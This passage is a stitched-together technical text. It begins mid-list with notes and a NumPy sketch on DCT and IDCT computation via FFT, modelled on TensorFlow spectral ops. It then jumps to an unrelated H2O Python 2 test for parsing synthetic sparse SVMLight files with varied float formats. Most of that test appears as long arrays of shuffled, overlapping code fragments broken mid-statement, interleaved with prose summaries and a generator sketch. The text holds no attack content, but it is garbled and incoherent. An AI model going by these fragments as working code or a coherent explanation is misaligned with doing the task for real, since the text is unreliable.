    https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py:
    1. multiply by 2*exp(1j*pi*u/(2N)), 2. pad x by zeros, 3. perform IFFT,
    4. extract the real part.
  - idct_N(x): the N-point variant: build a complex tensor whose imaginary
    half is a sign-flipped reversal of x, multiply by the expk twiddles, run
    one IFFT (scaled by 0.5 to match idct_2N; the normal way would multiply
    by 0.25), and de-interleave the result into even outputs z[..., 0:N:2]
    and odd outputs z[..., 1:N:2].
  - idxt(x, cos_or_sin_flag, expk): shared kernel; flag 0 selects the cosine
    transform and flag 1 the sine transform by reading the corresponding
    component of the IFFT output (an IFFT must be used here, not an RFFT,
    because the imaginary part is needed).
  - idst(x): the sine counterpart of idct_2N, using the expkp1 table and the
    imaginary part.

2D transforms apply a 1D kernel along each axis with a transpose in between:

    dct2_2N(x)  = dct_2N(dct_2N(x.T).T)     # 1D DCT twice; for an MxN input,
    dct2_N(x)   = dct_N(dct_N(x.T).T)       #   expk0 has length M, expk1 length N
    idct2_2N(x) = idct_2N(idct_2N(x.T).T)
    idct2_N(x)  = idct_N(idct_N(x.T).T)
    dst2(x)     = dst(dst(x.T).T)           # 1D DST twice

The mixed inverse kernels compute, for an MxN input, equations that differ
slightly from the standard DCT formulation:

    idcct2: y_{u,v} = \sum_p \sum_q x_{p,q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
    idsct2: y_{u,v} = \sum_p \sum_q x_{p,q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
    idcst2: y_{u,v} = \sum_p \sum_q x_{p,q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))

each built from idxt along both axes, taking expk_0 (length M,
2*exp(-1j*pi*k/(2M))) and expk_1 (length N, 2*exp(-1j*pi*k/(2N))).
idxst_idct(x) computes idxst(idct(x)) and idct_idxst(x) computes
idct(idxst(x)) by composing idct_N with the sine branch of idxt.
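The inverse trick mirrors the forward one: twiddle first, then pad, then a
plain IFFT. A minimal NumPy sketch under the same caveats as before
(idct_2N_sketch is an illustrative name):

    import numpy as np

    def idct_2N_sketch(x):
        # Unnormalized IDCT: y_u = sum_i x_i * cos(pi*(2u+1)*i/(2N))
        N = x.shape[-1]
        k = np.arange(N)
        xt = x * np.exp(1j * np.pi * k / (2 * N))                 # 1. twiddle
        x_pad = np.concatenate([xt, np.zeros_like(xt)], axis=-1)  # 2. pad to 2N
        y = np.fft.ifft(x_pad, axis=-1)[..., :N]                  # 3. IFFT, keep N
        return y.real * 2 * N                                     # 4. real part; undo ifft's 1/(2N)

    x = np.random.default_rng(1).standard_normal(8)
    i = np.arange(8)
    ref = np.array([(x * np.cos(np.pi * (2 * u + 1) * i / 16)).sum() for u in range(8)])
    assert np.allclose(idct_2N_sketch(x), ref)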
[ "\"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed", "the output (col 0) # random integer for class val", "num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList =", "print \"\\n\" + csvFilename # SUMMARY**************************************** # gives us some", "might fall short # track what max we really got", "need an output class, even if no cols are non-zero", "def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost SEED", "csvFilename # SUMMARY**************************************** # gives us some reporting on missing", "csvPathname # dict of col sums for comparison to exec", "[random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\"", "(dict) else: synColSumDict[colNumber] = val # sum of column (dict)", "synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should", "= random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)", "specified well # figures out everything from parseResult['destination_key'] # needs", "# is it okay to specify col 0 in svm?", "is not equal to expected %0.6f' % (v, compare)) synMean", "svm! if (val > valMin/2) and (val < valMax/2): return", "unittest, random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse", "val # sum of column (dict) rowDataCsv = \" \".join(map(str,rowData))", "out everything from parseResult['destination_key'] # needs y to avoid output", "import unittest, random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts,", "SEEDPERFILE, sel, distribution): # we can do all sorts of", "(dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the eol", "eol ? # randomly skip some rows. only write 1/3", "val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did we", "csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect =", "requires telling h2o parse it's a libsvm..doesn't detect automatically\" parseResult", "= 0 for i in range(rowCount): rowData = [] d", "% (rowCount, num_rows)) # need to fix this for compare", "timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse", "# when we generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict", "0.0)/rowCount # enums don't have mean, but we're not enums", "for class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val", "DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols,", "of col sums for comparison to exec col sums below", "random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val # sum of column", "write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): # we can do", "tryList = [ (100, 10000, 'cA', 300, 'sparse50'), (100, 10000,", "enums mean = float(inspect['cols'][k]['mean']) # our fp formats in the", "we can do all sorts of methods off the r", "it to be zero in this range. 
so we don't", "able to keep the list of fp sums per col", "colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key + \"_\" +", "sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel,", "the operations probably should have # been done in same", "number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print", "column should use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])',", "= addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val and (colNumber", "automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print", "= addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did we add", "%s num_missing_values %d should be 0' % (k, num_missing_values)) if", "mean = float(inspect['cols'][k]['mean']) # our fp formats in the syn", "sometimes only have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s", "'Result0 = 0', ] # the first column should use", "= random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount,", "k should be integers that match the number of cols", "sel, distribution): # we can do all sorts of methods", "one value per row! # is it okay to specify", "constant values, # to see if we have x specified", "'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution)", "(column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2,", "valMin = -1e2 valMax = 1e2 classMin = -36 classMax", "per row! # is it okay to specify col 0", "%s mean %0.6f is not equal to generated mean %0.6f'", "'cC', 300, 'sparse50'), # (100, 40000, 'cD', 300, 'sparse'), ]", "= 36 dsf = open(csvPathname, \"w+\") synColSumDict = {0: 0}", "is the only valid separator # add the output (col", "sums for comparison to exec col sums below (colNumberMax, synColSumDict)", "cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col", "string if colNumber in synColSumDict: synColSumDict[colNumber] += val # sum", "= h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows =", "tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult", "= float(inspect['cols'][k]['mean']) # our fp formats in the syn generation", "places=0, msg='%0.6f col sum is not equal to expected %0.6f'", "# been done in same order, so maybe the comparison", "= 0', ] # the first column should use this", "write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key +", "to fix this for compare to expected # we should", "colCount with random, we might fall short # track what", "expected # we should be able to keep the list", "range. so we don't print zeroes for svm! 
if (val", "val and (colNumber > colNumberMax): colNumberMax = colNumber else: #", "valMin, valMax, rowData, synColSumDict): # colNumber should not be 0,", "sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as", "values, constant values, # to see if we have x", "we really got colNumberMax = 0 for i in range(rowCount):", "(colNumber > colNumberMax): colNumberMax = colNumber # always need an", "r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force it to be", "comparison can be exact (or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f", "and (colNumber > colNumberMax): colNumberMax = colNumber # always need", "we have x specified well # figures out everything from", "num_rows = inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY**************************************** #", "synColSumDict: synColSumDict[colNumber] += val # sum of column (dict) else:", "if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def", "DO_SUMMARY = False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount,", "no cols are non-zero # space is the only valid", "val and (colNumber > colNumberMax): colNumberMax = colNumber # always", "# force it to be zero in this range. so", "(colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList", "] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution) in", "max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including", "exec col sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount,", "exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print", "valFormatted) # f should always return string if colNumber in", "as h2i, h2o_exec as h2e, h2o_glm import h2o_util zeroList =", "= (v + 0.0)/rowCount # enums don't have mean, but", "see if we have x specified well # figures out", "the configs have the same y..just check with the firs", "parsed to %s rows\" % (rowCount, num_rows)) # need to", "zeroes for svm! 
if (val > valMin/2) and (val <", "as h2e, h2o_glm import h2o_util zeroList = [ 'Result0 =", "classMax = 36 dsf = open(csvPathname, \"w+\") synColSumDict = {0:", "# space is the only valid separator # add the", "the list of fp sums per col above # when", "float(inspect['cols'][k]['mean']) # our fp formats in the syn generation sometimes", "return val valMin = -1e2 valMax = 1e2 classMin =", "print \"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated", "% (v, compare)) synMean = (v + 0.0)/rowCount # enums", "time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'],", "we might fall short # track what max we really", "40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount,", "\"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s", "# h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000,", "compare)) synMean = (v + 0.0)/rowCount # enums don't have", "print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: #", "# we should be able to keep the list of", "h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList =", "per col above # when we generate the dataset ###", "= val # sum of column (dict) return val valMin", "mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values", "are non-zero # space is the only valid separator #", "for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList: NUM_CASES =", "rowData.insert(0, val) synColSumDict[0] += val # sum of column (dict)", "localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5)", "val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val and", "colNumber in synColSumDict: synColSumDict[colNumber] += val # sum of column", "random, we might fall short # track what max we", "val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel)", "if d==0: if distribution == 'sparse': # only one value", "values per row.. 50% or so? for colNumber in range(1,", "values, # to see if we have x specified well", "to expected # we should be able to keep the", "(rowCount, num_rows)) # need to fix this for compare to", "if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1,", "it's a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2,", "\"\\n\" + csvFilename # SUMMARY**************************************** # gives us some reporting", "because the output will be there ## val = r.uniform(MIN,MAX)", "same y..just check with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0,", "= h2o.make_syn_dir() tryList = [ (100, 10000, 'cA', 300, 'sparse50'),", "self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum is not equal to", "not equal to generated mean %0.6f' % (k, mean, synMean))", "a val? 
if val and (colNumber > colNumberMax): colNumberMax =", "fp sums per col above # when we generate the", "0', ] # the first column should use this exprList", "synColSumDict): # colNumber should not be 0, because the output", "csvPathname = SYNDATASETS_DIR + '/' + csvFilename print \"Creating random\",", "# (100, 40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for", "the comparison can be exact (or not!) self.assertAlmostEqual(v, compare, places=0,", "val) synColSumDict[0] += val # sum of column (dict) rowDataCsv", "= h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE =", "off the r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin,", "generation sometimes only have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col", "num_missing_values %d should be 0' % (k, num_missing_values)) if __name__", "h2o_import as h2i, h2o_exec as h2e, h2o_glm import h2o_util zeroList", "it okay to specify col 0 in svm? where does", "colNumberMax): colNumberMax = colNumber # always need an output class,", "= random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber", "random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber should", "msg='col %s mean %0.6f is not equal to generated mean", "# the first column should use this exprList = [", "with random, we might fall short # track what max", "to get a max colCount with random, we might fall", "h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm import h2o_util", "specify col 0 in svm? where does the output data", "if val and (colNumber > colNumberMax): colNumberMax = colNumber else:", "return string if colNumber in synColSumDict: synColSumDict[colNumber] += val #", "localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def", "random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) #", "firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY:", "schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time']", "% (colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList)", "col above # when we generate the dataset ### print", "if (val > valMin/2) and (val < valMax/2): return None", "row.. 50% or so? for colNumber in range(1, colCount+1): val", "if we have x specified well # figures out everything", "range(rowCount): rowData = [] d = random.randint(0,2) if d==0: if", "msg=\"generated %s cols (including output). parsed to %s cols\" %", "= h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls):", "and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col sums:\", v,", "synMean, places=0, msg='col %s mean %0.6f is not equal to", "open(csvPathname, \"w+\") synColSumDict = {0: 0} # guaranteed to have", "do all sorts of methods off the r object r", "skip some rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close()", "we don't print zeroes for svm! 
if (val > valMin/2)", "SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000, 'cA', 300,", "num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\" + csvFilename", "use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY", "def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): # we can", "-1e2 valMax = 1e2 classMin = -36 classMax = 36", "class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED,", "value per row! # is it okay to specify col", "noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True)", "(100, 10000, 'cB', 300, 'sparse'), # (100, 40000, 'cC', 300,", "write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class", "assume all the configs have the same y..just check with", "colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val", "and (val < valMax/2): return None else: rowData.append(str(colNumber) + \":\"", "col 0 for output # even though we try to", "= [ (100, 10000, 'cA', 300, 'sparse50'), (100, 10000, 'cB',", "%s rows\" % (rowCount, num_rows)) # need to fix this", "an output class, even if no cols are non-zero #", "output data go? (col 0) colNumber = random.randint(1, colCount) val", "have mean, but we're not enums mean = float(inspect['cols'][k]['mean']) #", "(dict) return val valMin = -1e2 valMax = 1e2 classMin", "fall short # track what max we really got colNumberMax", "telling h2o parse it's a libsvm..doesn't detect automatically\" parseResult =", "colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to", "+ \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self):", "h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output). parsed", "# (100, 40000, 'cC', 300, 'sparse50'), # (100, 40000, 'cD',", "rowData, synColSumDict) # did we add a val? if val", "rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax,", "inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY**************************************** # gives us", "should not be 0, because the output will be there", "places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean %0.6f is not", "detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight')", "all the configs have the same y..just check with the", "of methods off the r object r = random.Random(SEEDPERFILE) def", "even though we try to get a max colCount with", "'/' + csvFilename print \"Creating random\", csvPathname # dict of", "the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if", "synColSumDict) # did we add a val? if val and", "= sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM = False def", "+= val # sum of column (dict) rowDataCsv = \"", "(col 0) colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin,", "in the syn generation sometimes only have two places? self.assertAlmostEqual(mean,", "syn generation sometimes only have two places? 
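A condensed sketch of that row generator, assuming a hypothetical
fp_format_sketch helper in place of h2o_util.fp_format (whose real case table
is not shown here); make_row and its parameters are illustrative names:

    import random

    def fp_format_sketch(val, sel):
        # stand-in: pick one of a few floating-point notations by case index
        fmts = ("%f", "%e", "%g", "%.2e", "%.10f")
        return fmts[sel % len(fmts)] % val

    def make_row(col_count, sel, col_sums, r, val_min=-1e2, val_max=1e2):
        row = [str(r.randint(-36, 36))]            # class label in col 0
        for col in range(1, col_count + 1):
            if r.random() >= 0.5:                  # ~50% sparse fill
                continue
            val = r.triangular(val_min, val_max, 0)
            if val_min / 2 < val < val_max / 2:    # treat small values as zero:
                continue                           # never print zeroes for svm
            col_sums[col] = col_sums.get(col, 0.0) + val
            row.append("%d:%s" % (col, fp_format_sketch(val, sel)))
        return " ".join(row)

    r = random.Random(42)
    sums = {}
    print(make_row(10, sel=3, col_sums=sums, r=r))
    print(sums)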
After generation, the file is parsed with h2i.import_parse(..., schema='put',
parser_type='SVMLight'); the dataset requires telling H2O to parse it as
libsvm, since the format is not detected automatically. The test then checks
the parse against what it generated:

  - shape: rowCount rows and colNumberMax+1 columns (including the output
    column), via Inspect;
  - per-column means: inspect['cols'][k]['mean'] must match the generated sum
    divided by rowCount within assertAlmostEqual(..., places=0), because the
    synthetic fp formats sometimes carry only two significant places;
  - no missing values: inspect['cols'][k]['num_missing_values'] must be 0.

When DO_COMPARE_SUM is enabled, each column sum is recomputed on the cluster
with an Exec expression ('Result<n> = sum(<keyX>[<col1>])') and compared
against synColSumDict. Even though both sides are floating-point sums, the
operations were probably not done in the same order, so the comparison may
not be exact (or not!) and is therefore also made with places=0. For
reporting on missing and constant values, h2o_glm.goodXFromColumnInfo is run
with y=0; all the configurations have the same y, so only the first one is
checked. An optional Summary pass (DO_SUMMARY) double-checks the column count.
(col 0) colNumber =", "valMax, rowData, synColSumDict): # colNumber should not be 0, because", "expected %0.6f' % (v, compare)) synMean = (v + 0.0)/rowCount", "valMax, rowData, synColSumDict) if val and (colNumber > colNumberMax): colNumberMax", "h2o_util zeroList = [ 'Result0 = 0', ] # the", "h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed()", "zeroList = [ 'Result0 = 0', ] # the first", "parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print", "# needs y to avoid output column (which can be", "h2o_exec as h2e, h2o_glm import h2o_util zeroList = [ 'Result0", "output class, even if no cols are non-zero # space", "cols\" % (colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM:", "= -36 classMax = 36 dsf = open(csvPathname, \"w+\") synColSumDict", "our fp formats in the syn generation sometimes only have", "\"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors()", "sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b,", "= r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force it to", "num_rows)) # need to fix this for compare to expected", "to expected %0.6f' % (v, compare)) synMean = (v +", "noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output). parsed to", "though we try to get a max colCount with random,", "300, 'sparse50'), # (100, 40000, 'cD', 300, 'sparse'), ] #", "timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output).", "%s rows, parsed to %s rows\" % (rowCount, num_rows)) #", "parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols']", "and (colNumber > colNumberMax): colNumberMax = colNumber else: # some", "% (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col", "val # sum of column (dict) return val valMin =", "num_rows, msg=\"generated %s rows, parsed to %s rows\" % (rowCount,", "global SEED, localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if", "\"w+\") synColSumDict = {0: 0} # guaranteed to have col", "+ '/' + csvFilename print \"Creating random\", csvPathname # dict", "really got colNumberMax = 0 for i in range(rowCount): rowData", "def setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed() localhost =", "% (SEEDPERFILE, sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR + '/'", "libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False,", "missing values, constant values, # to see if we have", "did we add a val? 
if val and (colNumber >", "done in same order, so maybe the comparison can be", "def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber should not", "SYNDATASETS_DIR + '/' + csvFilename print \"Creating random\", csvPathname #", "(v + 0.0)/rowCount # enums don't have mean, but we're", "= colResultList[k] print \"\\nComparing col sums:\", v, compare # Even", "col sums:\", v, compare # Even though we're comparing floating", "synColSumDict[colNumber] = val # sum of column (dict) return val", "colNumber in range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData,", "print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)", "maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount,", "compare to expected # we should be able to keep", "rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the eol ?", "column (dict) else: synColSumDict[colNumber] = val # sum of column", "compare # Even though we're comparing floating point sums, the", "be zero in this range. so we don't print zeroes", "rowData, synColSumDict): # colNumber should not be 0, because the", "of fp sums per col above # when we generate", "None else: rowData.append(str(colNumber) + \":\" + valFormatted) # f should", "synColSumDict[0] += val # sum of column (dict) rowDataCsv =", "> valMin/2) and (val < valMax/2): return None else: rowData.append(str(colNumber)", "order, so maybe the comparison can be exact (or not!)", "h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols", "above # when we generate the dataset ### print \"\\nsynColSumDict:\",", "# only one value per row! # is it okay", "self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to %s rows\" %", "separator # add the output (col 0) # random integer", "tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList", "= h2o_util.fp_format(val, sel) # force it to be zero in", "### print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM:", "[ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM =", "# did we add a val? 
if val and (colNumber", "if DO_COMPARE_SUM: # k should be integers that match the", "dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if", "configs have the same y..just check with the firs tone", "# to see if we have x specified well #", "comparing floating point sums, the operations probably should have #", "# f should always return string if colNumber in synColSumDict:", "msg=\"generated %s rows, parsed to %s rows\" % (rowCount, num_rows))", "v, compare # Even though we're comparing floating point sums,", "sum of column (dict) return val valMin = -1e2 valMax", "d==0: if distribution == 'sparse': # only one value per", "colNumber # always need an output class, even if no", "SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel,", "index or name) # assume all the configs have the", "we generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v", "we're not enums mean = float(inspect['cols'][k]['mean']) # our fp formats", "dataset requires telling h2o parse it's a libsvm..doesn't detect automatically\"", "per row.. 50% or so? for colNumber in range(1, colCount+1):", "(k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s", "0) colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax,", "300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs,", "print \"This dataset requires telling h2o parse it's a libsvm..doesn't", "have x specified well # figures out everything from parseResult['destination_key']", "the syn generation sometimes only have two places? self.assertAlmostEqual(mean, synMean,", "short # track what max we really got colNumberMax =", "%0.6f' % (v, compare)) synMean = (v + 0.0)/rowCount #", "the first column should use this exprList = [ 'Result<n>", "vary the eol ? # randomly skip some rows. only", "parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename,", "generated mean %0.6f' % (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values']", "test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100,", "column (dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the", "classMin = -36 classMax = 36 dsf = open(csvPathname, \"w+\")", "# track what max we really got colNumberMax = 0", "col 0 in svm? where does the output data go?", "= random.randint(0,2) if d==0: if distribution == 'sparse': # only", "methods off the r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber,", "synColSumDict) if val and (colNumber > colNumberMax): colNumberMax = colNumber", "? # randomly skip some rows. only write 1/3 dsf.write(rowDataCsv", "@classmethod def tearDownClass(cls): h2o.tear_down_cloud() def 